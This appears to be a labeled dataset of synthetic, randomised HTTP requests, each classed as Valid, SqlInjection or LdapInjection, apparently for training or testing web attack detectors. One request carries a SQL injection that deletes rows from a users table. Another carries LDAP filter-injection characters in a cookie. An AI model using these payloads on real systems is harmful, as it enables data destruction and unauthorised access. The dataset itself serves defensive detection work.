Referer: /osoEpv/2e2oxet/teettT/antt7rp.asmx
TE: deflate;q=0.2,chunked,trailers
Trailer: Referer
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 6.0; se-oz; rv:3.7.5) Gecko/71763791
UA-CPU: StrongARM
UA-Disp: 8644,7671,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1o7cnc/8.8 30.253.95.105
Transfer-Encoding: identity
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41597
Start - Id: 42391
class: SqlInjection
GET /oozgqeoft2camr.tiff?esvn=yvs%24ns0hp&c5rnu=niodIeHmatr&uknegnbt=4310384&nzrei2v=Lot5taH%27++++%29%3B++DELETE+++++FROM++++users+++WHERE++upper%28username%29++%3D+++++upper%28+%27admin HTTP/1.1
Host: 56.133.76.219:9
Connection: close
Accept: text/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate;q=0.2, gzip;q=0.7
Accept-Language: rrseea-runt9cm, ee4c-d9wdc;q=0.7
Cache-Control: max-stale
Client-ip: 173.58.91.50
Cookie: e21=4616249;chleosynace=<fwEor;bdbme1lhsretra9=8563;-samf@echo=hrfpkvGeumdl
Cookie2: $Version="2"
Date: Fri, 31 Jul 09 17:20:23 GMT
ETag: "CDmsLIMNDEVrfaLecxl"
Expect: 100-continue
From: erTuul@i55mmhby.gov
If-Modified-Since: Thu, 12 Nov 09 12:32:09 GMT
If-Unmodified-Since: Tue, 24 Jun 08 13:50:13 GMT
If-Match: "1oebzebAMMjdc3tW-WT"
If-None-Match: *
If-Range: Thu, 03 Aug 06 01:18:18 UTC
Max-Forwards: 3
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM SW5vdWN0c2hQbnJvbmFldGFwbnBhYWszdXNhdGhvZGlnY3J5
Range: -012964
Referer: /nbIiga/bd1iait/cwte.txt
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/1.5 (Windows; U; Win98 8.1; 2s-iw; rv:7.8.7) Gecko/21240625
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: FTP/4.9 www.ossl1ece.html, HTTP/3.1 www.erqgiryn.gif, exGen/9.5 www.lePid.htm
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42391
Start - Id: 5245
class: Valid
POST /ziaeewg7meqat/tSmhFheee/yjRQosLIAQ1qOy/xmWmjCVw0hm6R9N/R4QFqN/ulmtlenaokaokRc3oaea.nsf? HTTP/1.0
Content-Length: 314
Content-Language: edsw,rPUNruRu,ceEaatz
Content-Encoding: gzip
Content-Location: /odse6oi/rlkjib/ga70eO/hnno/vheYen.jpg
Content-MD5: ZXhkbG5hbUVNdXd1bG02UA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 03:48:20 CET
Last-Modified: Mon, 08 Feb 10 13:57:43 UTC
Host: www.gsFAEb.net
Connection: lBOdibee
Accept: video/quicktime;q=0.0, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: rodnT6r-enao, txrq87oe-mopru;q=0.0, ytE-tobhwh;q=0.4, mtwutegb-ysl9d;q=0.7
Cache-Control: no-transform
Client-ip: 78.163.7.145
Cookie: eylm=wxLNHdQZEFA
Cookie2: $Version="74"
Date: Tue, 20 Feb 07 07:14:38 GMT
ETag: W/"VQJWXBbtX-vVHXeg"
Expect: 100-continue
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Mon, 31 Mar 08 10:29:18 CET
If-Unmodified-Since: Sun, 04 Feb 07 18:52:56 GMT
If-Match: "4aujJZ0B7vuH-nw4k57"
If-None-Match: *
If-Range: "R4bpmj@yXhuH1Q9x"
Max-Forwards: 8317
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM NDJhMjByZlVuaGFTdGN1YXcwbXRhYW44bkEyZ3dJb2h0bjNsZWVuTQ==
Authorization: NTLM ZG5tZWVvSG8zVGJuaHJ1bmVjaXJ0aGRpRXRubTNhb2RxcHNlejVhdHJhYWdlbg==
Range: 627-96060,029458-
Referer: /tbtJwbep/zaxmsA/ochthi/bdpistE.php3
TE: chunked;q=0.9,gzip,trailers
Trailer: If-Range
User-Agent: cSiE6w (y3tGso8f5; ot3mNvd; hbsHEdy@Nf)
UA-CPU: PowerPC
UA-Disp: 793,8160,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4414x768
Via: 5.4 www.v7rDtes.jpg
Transfer-Encoding: deflate
Upgrade: dnid/6.6, cGoH/6.5, no1o/5.3, ni9ihh/8.4
Warning: 362 www.tsihSe9.js "t0omneapbr2e9lmgou4g" "Fri, 03 Mar 06 12:16:45 UTC"
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

09leirh0u9efcum=an j%e4io0aea$osbh[A&ngC=tBtRZP&pteh=la-i Ual5/ 7ir&ihmfmaqlojdo=29499&iiOUuaeejpon=t<yp3dA&uO=tMmGm&kestt8yro=x2lL&irmrosIaz=oa&rattle=669&Lziedniuexbb2lg=ue--.gn&includeRupdatewform8ky=dE;la%&oE2x@l_=2detO&ghwM7eCGzt1f=nbhifecselectDbqstyleNxa&eni=o4AMt&SjmdzonaonxlE=5aniltcaEObrhI

End - Id: 5245
Start - Id: 10266
class: Valid
GET /83N/PlKEinput/vhFcrYLyoC7NQwDM/y6nshutdownIxxG9VzxiHZ/qn/fIuZQaMwK@/uggcmOzdTan36on4esxi/eFPpn/gGZ4Uj7h7nl.jpeg? HTTP/1.0
Host: www.thzc.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=61855
Client-ip: 80.179.174.255
Cookie: yo5rmcni=qee99st-lt 9p;oeitsa=lmdwRar2nd;1mun4ttu69d=aHXVLt
Cookie2: $Version="4"
Date: Tue, 24 Apr 07 13:50:45 UTC
ETag: "BfreOJ3WE66pfgqBB"
Expect: 100-continue
From: o8tAct@lradog.be
If-Modified-Since: Sat, 13 Jun 09 18:55:52 UTC
If-Unmodified-Since: Sun, 30 May 04 12:16:57 UTC
If-Match: "OUdVkhYj4ZScNUmaKQW2"
If-None-Match: *
If-Range: Sun, 02 May 10 10:18:12 CET
Max-Forwards: 847
MIME-Version: 0.7
Pragma: ee4inht=lc
Proxy-Authorization: aa0et EnnLMv=fsay
Authorization: Digest username="esi4j"
Range: 48806-,859-40,-983
Referer: /tEbh2tag/n8iooeue/snyIonex/Rujcr.cgi
TE: deflate;q=0.6,trailers,gzip
Trailer: If-Range
User-Agent: oWzyY0eRdE http://www.tovud4.com
UA-CPU: Sparc
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0000x0475
Via: 5.4 www.sLel.gif
Transfer-Encoding: Eicrt; phh4=loLnmu3
Upgrade: shoceh/2.3, belfot/0.4, n5AeS/6.7, pjnr/5.8, itP/7.3
Warning: 381 www.swT2Ci.png "AmssmipzjstT" 
X-Forwarded-For: 205.147.122.108
X-Serial-Number: 5538432
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10266
Start - Id: 30062
class: Valid
GET /Nritt3nsai3y/08tJ/7H/eMvw.DX/kiCMMQCChxSG@DzNHrW/vr8/formhaving3/oieeoppcp.shtml?ephlvnm9watvO=9cyd%3De4d&2lhnugv1eosnoi=tRR&oovay=a5io&lewoedlnO1t=46&y0as8raw=beanioejeoeeseaher&Iwetlbtaryou=66&ilocation06Mxs8D=Der HTTP/1.1
Host: 210.126.167.12:211
Connection: close
Accept: video/*, text/*, audio/x-wav;q=0.0
Accept-Charset: x-mac-arabic;q=0.1, x-mac-arabic;q=0.0, big5
Accept-Encoding: identity;q=0.6, deflate;q=0.8, deflate, gzip;q=0.6
Accept-Language: xia3fitf-OebmnonF
Cache-Control: min-fresh=412
Client-ip: 21.39.235.102
Cookie: qsiaNc8Unssb=Eleyltne7otilfrompechos5<
Cookie2: $Version="16"
Date: Mon, 17 May 04 14:14:15 UTC
ETag: "X4X3wSkRbcqHJDFv7fQ"
Expect: dcin=m4dot
From: 8hdarpl@eewtgm.st
If-Modified-Since: Sat, 29 Dec 07 01:24:00 GMT
If-Unmodified-Since: Fri, 03 Oct 08 11:15:31 GMT
If-Match: "x7xAK9C04pbrdX9oyAn"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 0.9
Pragma: eydrc=snvead
Proxy-Authorization: hh5ore wukONet=mohs
Authorization: Mlyi tho7eP8=nnfuthyg
Range: 801-,-797
Referer: http://ufitEK.cz/alanion/Utoh9/sesl/eaaEiehD.swf
TE: chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 4.3; ro-Eo; rv:5.1.0) Gecko/36601221
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8553x7465
Via: t00Fs/8.7 www.M0uTld.htm, 2.8 255.89.169.43, FTP/4.3 www.iNyt.html:9
Transfer-Encoding: compress
Upgrade: nAijsd/7.5, o6a/9.9, ptft/5.9, fof9/8.2
Warning: 496 239.40.26.43 "thgzpmOrfs4aeg" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 418347308
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 30062
Start - Id: 5135
class: Valid
POST /.nlib1Us7KA-Fm/cPZemTP9HCS9fNGl/hjq4MiqGyk6KMV/sClQOzZu/rL0F9.exe? HTTP/1.0
Content-Length: 251
Content-Language: itse
Content-Encoding: deflate
Content-Location: /aeeetsid/7erCu4/fvqbeeq/fn9ie.pl
Content-MD5: dGVtZW5ocmFkdHNreE1ybg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 04 19:02:53 CET
Last-Modified: Sat, 01 Mar 08 05:56:38 GMT
Host: www.ehoEtoo.fr:5771
Connection: close
Accept: application/x-tar;q=0.7, audio/*, image/png;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: oosmnD-bAeno;q=0.4, h-tSe
Cache-Control: max-stale=7
Client-ip: 167.58.57.131
Cookie: leegtsaEtsdvowo=93tis/lsWninputsCyiorm;ctremMfuxowM2=238
Cookie2: $Version="190"
Date: Sat, 16 Sep 06 09:47:31 UTC
ETag: "8E82KKTK9E5YqyL"
Expect: 100-continue
From: daodwiso@rGHdclsrni.org
If-Modified-Since: Sat, 26 Jan 08 16:16:33 CET
If-Unmodified-Since: Sun, 29 Jan 06 10:09:08 CET
If-Match: "v3btyJVKqzEqaBX"
If-None-Match: "DfgDudzTfghhMxeLR"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.5
Pragma: aeSalho=jea2ry0S
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: Basic ZmVvZm51aWk6aGFwcg==
Range: -00275
Referer: /eoTl/nnht/enesf/euaom/saic.php
TE: trailers
Trailer: Transfer-Encoding
User-Agent: nrgtqK http://www.e3up.uk
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6026x4919
Via: 8.6 126.42.77.53:9084
Transfer-Encoding: compress
Upgrade: pnpc/1.3, oTfn/4.8
Warning: 224 227.126.233.183 "ehAds4enRxnay" 
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 64870443961077
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sbd4ec=20stc&h?mu>&wnotcbtwNkMe=470493&vnhr22=rRhCUyX@y&alxeHot9sadbuic=4swd2&es4Msdt1ddaar=mx&oo2rLhledtkN3=rSkc&r9istabBqdiwne=winnt3Lrt|7e&cfnraT9dho=avFSv6&2rAi8ann=31348405&tbaaauo=E9ib&tro4yntn=5808652681&ncShz9sVqDH=32&fOL5v3qaTj=1172

End - Id: 5135
Start - Id: 9431
class: Valid
GET /ui/uGQupwlQ2X2cFpo/BlogPw.includelTMw.asp?fharTg=uNF-8nkdd&h6tehnfeneemsm=n4bxzT&Iieai=3&mct9or=eobe+ansaletehttp&iio1iksfmlilNe=ee6autoexecnf+etSp+m&ce2goSNbnorb=wnABoY6m0&eeoswqeonyag3i=507795193&8nregW7aei1=221937&khoiyn=t-P&dKJHOJIb_D=b6hEx-TkJp4&selectOFlikeewindow.openuscriptdwindow.openwx=aupdatefdin+i99snqhtacces%40%3AabA7&LyT.9y9i3childr=vmheeqse6eentto&EbodylsG_5=ryJ%25rj+bodyzokt+&KRgLJYg=9801444 HTTP/1.1
Host: www.tpiemeiE.cz
Connection: Rsho5
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, compress;q=0.0, deflate, deflate
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 225.95.160.205
Cookie: filaldahvd=otpabiim gn;wTTK=02376001
Cookie2: $Version="97"
Date: Tue, 06 Apr 04 17:50:06 CET
ETag: W/"t0GK3rq@Ccs.7X89-Zn"
Expect: Sy1e1tE
From: wibwt3iO@ihhho.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Sun, 12 Feb 06 24:20:38 GMT
If-Match: *
If-None-Match: "tSdivayoQCekg7E0VJhR"
If-Range: Mon, 08 Aug 05 15:26:55 UTC
Max-Forwards: 91
MIME-Version: 4.1
Pragma: reiha='2ita'
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: Basic ZENsbW9uOjNrdHI=
Range: 13-1,-254711
Referer: http://www.o2ft.biz/rIaixars/lepoaee/ha3eMwt/icee.gz
TE: deflate;q=0.5,trailers
Trailer: From
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 7.6; ro-jp; rv:7.2.4) Gecko/70581535
UA-CPU: 68000
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7787x120
Via: 6.6 116.230.83.102
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 738 140.221.7.254 "oocsausmslte1sij8e" "Sun, 16 Nov 08 18:45:16 CET"
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9431
Start - Id: 3428
class: Valid
GET /an1oCbPCIz/rrZe/scmieoau6otnsoe/inRXC1tjmQx/itdH1tsepiteeoosrqs/rfcenmte/IncpCalKnUYGchild.mspx?aemuelbhdotatmw=2cwonat&DJreplaceyx=eh7.&AvhZNl=9915603&oaihdacvtdAre=tlkprratvigdusfese&CQdfyaccept=6f%2Boeaeo&tTt9nhesSj=AioS HTTP/1.0
Host: 176.146.253.218
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: N-eneXtef, n-by3rohla;q=0.0, aifAeir-udTxx, 4rRe1a-v6ahoa;q=0.4
Cache-Control: only-if-cached
Client-ip: 124.22.72.58
Cookie: jtandqrc9=eenetcat(;2MQZ_I=0901213;lb1k=5452417;0a2ttw3.=59685497
Cookie2: $Version="748"
Date: Thu, 17 Nov 05 15:23:29 CET
ETag: W/"-ux1L@tJgN0cXsjizl_"
Expect: sstme=eTehehs;lsJr=etacnI
From: otEj@3satd.de
If-Modified-Since: Tue, 04 May 04 05:12:47 CET
If-Unmodified-Since: Mon, 31 Aug 09 24:54:14 GMT
If-Match: "i4piovc2Bj8ES3w"
If-None-Match: *
If-Range: Thu, 15 Apr 04 08:18:14 UTC
Max-Forwards: 8272
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest response="FE0E6b5BFFCfDCda4e93Ab8BFb700c11"
Authorization: Digest nonce
Range: -79,44302-,67-20461
Referer: /3iieq/rdl0/naudpo/0ssl.msf
TE: trailers
Trailer: Date
User-Agent: hA49snohIdlndrobo9
UA-CPU: MIPS
UA-Disp: 627,2976,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 969x7653
Via: HTTP/5.8 www.Lo5eRl.jpg, HTTP/6.5 www.shIhenir.css, 8.5 203.149.62.120
Transfer-Encoding: 3drgte; dbha=vg0rynr
Upgrade: rdse/9.1, lomd/5.7
Warning: 682 122.84.45.120 "hiq8gwIlahfmhHa" 
X-Forwarded-For: 60.74.245.251
X-Serial-Number: 80963840971
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3428
Start - Id: 22252
class: Valid
GET /edcy05a1hmek/O8FEulbqIEj-e/sod5pu/xb/horrywreawO/iihoob.mdb? HTTP/1.1
Host: 204.239.71.96:850
Connection: u6l5
Accept: audio/basic, image/jpeg;q=0.5, application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: iset-tos1mcNr, thuut-80inn;q=0.0, 7-odoeuitc;q=0.2, ii-aD;q=0.4, nmipo-btAgy
Cache-Control: max-stale
Client-ip: 62.159.240.239
Cookie: Ow.uEs.q= h;oSrEjnn3s=13565019;nasaLsxnns0lai8=t;Msecoolt3M=Reibodyraccept $aftp-0a;id-;hf7ilndRdyce=Rnel3T;oe=adpa rx
Cookie2: $Version="6"
Date: Thu, 05 Feb 04 23:27:23 UTC
ETag: W/"8rDlKlxFywn4a_UjV6P0"
Expect: 100-continue
From: orEtts@ismhaeter.de
If-Modified-Since: Sun, 31 May 09 04:49:31 GMT
If-Unmodified-Since: Tue, 24 Jun 08 11:40:56 CET
If-Match: *
If-None-Match: "ttxIPE17reuLrO."
If-Range: *
Max-Forwards: 522
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: Digest opaque="oWtn"
Range: 00-
Referer: /Uuryso.nsf
TE: trailers
Trailer: TE
User-Agent: ok8ma9g http://www.slNexoi.ch
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 196x167
Via: 5.4 52.233.71.226, FTP/4.7 55.166.43.74
Transfer-Encoding: gzip
Upgrade: 7uo/5.0, nadyvi/1.3, iiem/5.7, lCt/7.8, eclh/5.0
Warning: 625 www.bcOiE.htm:75 "aNlih4dh3" "Fri, 31 Mar 06 08:32:01 UTC"
X-Forwarded-For: 204.223.4.134
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22252
Start - Id: 3214
class: Valid
GET /tn3hWd-QDYguHy0g2UZ/gZYq4p/bVuEAR-iSAT/z5SgOFIJTRP9I-D/on4B/6qe114jz5LWT/l4PMXNnGMZ.jpeg?Vg=911821823&rors=ain%26ihdousnelee HTTP/1.0
Host: www.f0ioan.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: nCesn-z, lwvr-5Umtd;q=0.2, emaroR-5ooteem, ak2geip-dno;q=0.0
Cache-Control: min-fresh=29597
Client-ip: 192.93.149.37
Cookie: c@RTlFdb8aIj=yZXeG;eaD=a;ohniitwhalecre=Ruaexterm4tt;atu9=oJZ
Cookie2: $Version="79"
Date: Mon, 23 Feb 09 11:04:26 CET
ETag: "4cEYoUmf_Sb4ohTmTTa"
Expect: 100-continue
From: gtaowcs@coac.st
If-Modified-Since: Tue, 10 Jul 07 08:59:44 GMT
If-Unmodified-Since: Wed, 17 Nov 04 11:19:59 GMT
If-Match: *
If-None-Match: "rU-adQOltcVU4XPAN3"
If-Range: *
Max-Forwards: 968
MIME-Version: 3.1
Pragma: 1thft='okeor'
Proxy-Authorization: NTLM amlhbnBCSGc3YWFuQWVlYUhlYW82aHV0dTQyY2ZvcmhFZWVkaA==
Authorization: Digest uri=/aasenepL/Ttarpr/dcyonot/uonayra/xsnhtac.doc
Range: -1
Referer: /ooEtxpc/aicpNt/ellddi0/Peli/h7htn2in.php4
TE: chunked,trailers,deflate
Trailer: TE
User-Agent: ddtmgckmag (t-cC1Aju-; mrqXsSJpbP; 3spKQ3U; rhZTkA_)
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x7403
Via: 7.3 www.uiolir.png, FTP/1.8 101.126.134.18, FTP/3.5 www.Egyytaa.png
Transfer-Encoding: identity
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 8986930921
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3214
Start - Id: 33363
class: Valid
POST /8AbQpZaRvZqpQ/RCcl7/mtAFuw11/fSx8GfrqwYnJ1@Wtj_f6/bTn7U/8Y/-Tpa9acceptShavingDb7.Xx.htm? HTTP/1.1
Content-Length: 161
Content-Language: c8necgrn
Content-Encoding: deflate
Content-Location: /e7eceshe/dsEdteAr/rn3oLSl/as6a/e1atyv.pdf
Content-MD5: TmV0eWVvZmVhcmdsczltUw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Dec 08 06:27:51 UTC
Last-Modified: Tue, 17 Jul 07 08:03:09 GMT
Host: www.oTiA.st
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i;q=0.5, iso-8859-3, iso-8859-3;q=0.0, x-mac-hebrew
Accept-Encoding: deflate;q=0.8, compress;q=0.0, gzip
Accept-Language: ol6mH-eWvd;q=0.3, yeotefe-weytShs;q=0.4, iEhsln-v
Cache-Control: max-age=2566
Client-ip: 194.231.198.230
Cookie: 9eevin=r;Pl4tS_GU2Vn=ekpthshutdownol;je=59250;eevfReeeOfy=IHhqe;ontsndtat=;bOfrom0tenh
Cookie2: $Version="1"
Date: Tue, 26 Dec 06 19:06:56 GMT
ETag: "HTeaV3unk6Zkq-7EKBuw"
Expect: 100-continue
From: EinolCd@e1annaob6.gov
If-Modified-Since: Tue, 27 Apr 04 15:38:24 UTC
If-Unmodified-Since: Sat, 08 Nov 08 05:43:11 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Oct 07 12:19:55 CET
Max-Forwards: 38
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: Digest cnonce="Ets6nc"
Range: -69,-4,172-
Referer: /ogwseat.jsp
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: igbhn (sBqcPs-v)
UA-CPU: MIPS
UA-Disp: 6397,158,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: FTP/0.2 225.124.59.85, 7.8 www.aqlfs.html, FTP/1.2 www.2cn9te.css
Transfer-Encoding: ihss
Upgrade: tqo/8.5, hd7t/7.1
Warning: 024 183.247.152.106:01 "caee7oieenaqu19hTsdR" "Wed, 15 Apr 09 07:52:38 CET"
X-Forwarded-For: 113.32.119.185
X-Serial-Number: 93235551323019151899
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PdWMk-.=61902&s9Ete8e7=40&gnthurLe82r9jeg=0oleh nx&oRskn1yspjn=4&9flo=cB8wa|1efel6&i8rlc=58&coEe=crtyw59&bemiQwglhgdFiq=anha/ojimo insert154nx&uaDhtDec=k2i3X

End - Id: 33363
Start - Id: 39076
class: LdapInjection
PUT /eN03KB.81lB-mx6q2F/T7tmpJs8nph-SFA8/tttwicziptare3/Tb7qNl/gOnpFiednr/iP/d1y606mO1Taimcmi/lhiiye/sx/anp/luqDnwaJ.js? HTTP/1.0
Content-Length: 301
Content-Language: urolm
Content-Encoding: compress
Content-Location: /easRcOe/tge9eeen/nAhv/Teiljsee.sh
Content-MD5: ZWI0dG80cnRVY2UyZHRhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Mar 06 11:36:41 GMT
Last-Modified: Sat, 26 May 07 13:19:49 CET
Host: www.teprnmsE.net
Connection: rrqe
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2889
Client-ip: 220.211.201.119
Cookie: atuejtpr3=epbridt%netcate:[le]af;ne=hbul~sLru8 fdhaea/;nWlcv2sh=)(  |    (teOa=sith*)
Cookie2: $Version="23"
Date: Fri, 26 Mar 10 19:16:27 GMT
Expect: 100-continue
From: emCpna@Taya.fr
If-Modified-Since: Mon, 15 Dec 08 17:51:42 CET
If-Unmodified-Since: Sat, 13 May 06 07:11:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Sep 05 15:48:47 GMT
Max-Forwards: 5613
Pragma: enrdlc='9'
Authorization: Digest nc=F05b905A
Referer: /cfmb.msf
TE: trailers,trailers,gzip;q=0.8
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 0.2; pe-tt; rv:5.2.2) Gecko/20663346
UA-Color: color16
UA-Pixels: 9422x4154
Via: 3.3 8.120.37.195, 4.8 www.wroobI4.tiff, HTTP/5.4 www.2eje6t.htm:73
Transfer-Encoding: gzip
Upgrade: shgeYE/4.5, edMa/4.2
Warning: 186 84.167.55.88 "yOnBOtb" 
X-Serial-Number: 89118020643
~~~~~: ~~~~~~~~~~

6tmcutsnhpoo=daPr2&Hmnhnh=aJgdhjanTtC&t1suNzwadkHi1oe=d&ameg6o=dguepnno&ToitX5=thIwhdec&fe=ttdao6ELupeiesunu&reoamrxtr= tmpwcn=fyiq5r&wchgm=pdbByohlpa7j1&rt1r9=ygvVg&Nmbsngdehmseuy=eirRyfwegsteai&RPYndNWp=eDpH@5z0tw&telnet17BqP@Bexec=5816753&ubsh=ees8dirheSeisoteOi&tlr=rnonbh&8haassnom=dpf.6FtTsw

End - Id: 39076
Start - Id: 26825
class: Valid
GET /22VQewiv.tmpn6/sXIzYRbE/mFpfXWO87Nlw/ZlwinntE.html?VXqEhome=79&eadhetOE=iwonmogservicesA%3Etelnetev&rdfqtTfretiii=e7Ssnqaeapia&Die=iframe9 HTTP/1.0
Host: www.Epzeofo.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: nharoof-l;q=0.5
Cache-Control: max-age=61
Client-ip: 236.78.214.28
Cookie: dcQgV=hteAtu9aEfthoie;sm=holcoi'ec92se8
Cookie2: $Version="419"
Date: Wed, 29 Sep 04 04:46:29 GMT
ETag: "gbtpvYZTunud1Vk."
Expect: 100-continue
From: 4ahee@onawd.st
If-Modified-Since: Mon, 07 Sep 09 18:06:44 GMT
If-Unmodified-Since: Fri, 02 May 08 16:19:20 CET
If-Match: *
If-None-Match: "cEahrBQ2hDbHR.EIm"
If-Range: Thu, 10 Aug 06 12:29:18 CET
Max-Forwards: 0804
MIME-Version: 1.2
Pragma: Rc=ihrnc4
Proxy-Authorization: Digest realm
Authorization: he0acl apeterat=gd5ednlo
Range: -6214
Referer: /ak9et/oweniYoi/e8elp/hoiuim8.jsp
TE: chunked;q=0.5,deflate
Trailer: Via
User-Agent: Mozilla/4.9 (X11; U; Open BSD i386 6.0; yc-st; rv:8.3.1) Gecko/20143492
UA-CPU: StrongARM
UA-Disp: 119,955,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9604x4951
Via: FTP/5.8 www.gOilxsrn.shtml:46620, 4.2 153.96.22.24:299, Atxa/1.7 96.119.2.50:7142
Transfer-Encoding: identity
Upgrade: tniiag/4.7, oosdd/1.5, art/0.2, 1oioc/8.7, riu/1.5
Warning: 903 67.160.229.95 "skdeatIepssEhEp" "Mon, 06 Aug 07 13:22:12 UTC"
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 51104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26825
Start - Id: 6965
class: Valid
PUT /A3aEnnohbnticnex2wiT/ht/r_/Jqxmlhome/a5ifLfSOcQUfnRa4-f/ildsmeoDloHhT9n4.jpg? HTTP/1.0
Content-Length: 310
Content-Language: xsbthen,S8
Content-Encoding: identity
Content-Location: /tote8v.js
Content-MD5: aWhpeHNoc2NoZ29yYmV1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 15:27:35 GMT
Last-Modified: Wed, 07 Nov 07 24:20:02 UTC
Host: 149.226.34.85:80
Connection: keep-alive
Accept: application/*;q=0.9, text/plain;q=0.2, audio/*
Accept-Charset: iso-8859-2, x-mac-arabic;q=0.2, cp-932;q=0.8, euc-tw, x-mac-arabic
Accept-Encoding: 
Accept-Language: erels-n1a99, m2cIa-d, owe-a;q=0.8, zthei-HsaaE
Cache-Control: only-if-cached
Client-ip: 184.188.74.95
Cookie: epaF=cSsosx
Cookie2: $Version="522"
Date: Mon, 23 Nov 09 13:02:27 CET
ETag: W/"NL_m1mDqJIQByLH"
Expect: 100-continue
From: coetw@Dezgd.biz
If-Modified-Since: Sun, 14 Nov 04 19:22:36 UTC
If-Unmodified-Since: Tue, 03 May 05 12:19:42 UTC
